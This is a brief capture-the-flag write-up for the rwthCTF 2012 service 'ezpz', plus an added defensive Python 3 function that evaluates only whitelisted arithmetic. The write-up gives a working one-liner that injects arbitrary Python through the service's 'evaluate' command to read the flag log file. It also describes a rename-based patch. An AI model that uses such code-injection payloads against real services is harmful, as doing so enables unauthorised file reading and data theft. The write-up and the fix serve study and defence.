Lobotomy Team

rwthCTF 2012 - ezpz

Flags were stored in log/ezlog and we could get them via ezclient.py

Exploit:


./ezclient.py 10.12.X.10 evaluate 'fl = open("/home/ezpz/log/ezlog","r"); \
	 print fl.read(); fl.close()' | egrep -o -e "\w{16}"

Patch:

mv log `uuid` and change the path in ezpz.py from log/ to the generated UUID

Also there was another vulnerability, where you could get whois information, register and make admin_check,
but we didn't use it because I found it much later
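
The rename in the Patch above moves the log, but evaluate still executes whatever Python the client sends. As an added example (not part of the original write-up or of ezpz.py), one way to close that is to parse the input and allow only arithmetic. It assumes evaluate is meant for arithmetic expressions, which the page does not state; it is written for Python 3, and safe_evaluate, RejectedExpression and MAX_EXPR_LEN are hypothetical names.

```python
import ast
import operator

# Allowlist: only these AST operator types are ever evaluated.
_BIN_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul,
            ast.Div: operator.truediv, ast.Mod: operator.mod}
_UNARY_OPS = {ast.UAdd: operator.pos, ast.USub: operator.neg}
MAX_EXPR_LEN = 200  # constructed limit; bounds parse cost and nesting depth


class RejectedExpression(ValueError):
    """Raised for any input outside the arithmetic allowlist."""


def _eval_node(node):
    # Numeric literals only; type() comparison also excludes bool and str.
    if isinstance(node, ast.Constant) and type(node.value) in (int, float):
        return node.value
    if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
        return _BIN_OPS[type(node.op)](_eval_node(node.left), _eval_node(node.right))
    if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY_OPS:
        return _UNARY_OPS[type(node.op)](_eval_node(node.operand))
    # Calls, names, attributes, subscripts, lambdas, ... all end up here.
    raise RejectedExpression("disallowed syntax: " + type(node).__name__)


def safe_evaluate(expr):
    """Evaluate client input as pure arithmetic, without eval() or exec()."""
    if len(expr) > MAX_EXPR_LEN:
        raise RejectedExpression("expression too long")
    try:
        # mode="eval" accepts a single expression; statements fail to parse.
        tree = ast.parse(expr, mode="eval")
    except (SyntaxError, ValueError) as exc:
        raise RejectedExpression("not a single expression") from exc
    try:
        return _eval_node(tree.body)
    except ZeroDivisionError as exc:
        raise RejectedExpression("division by zero") from exc
```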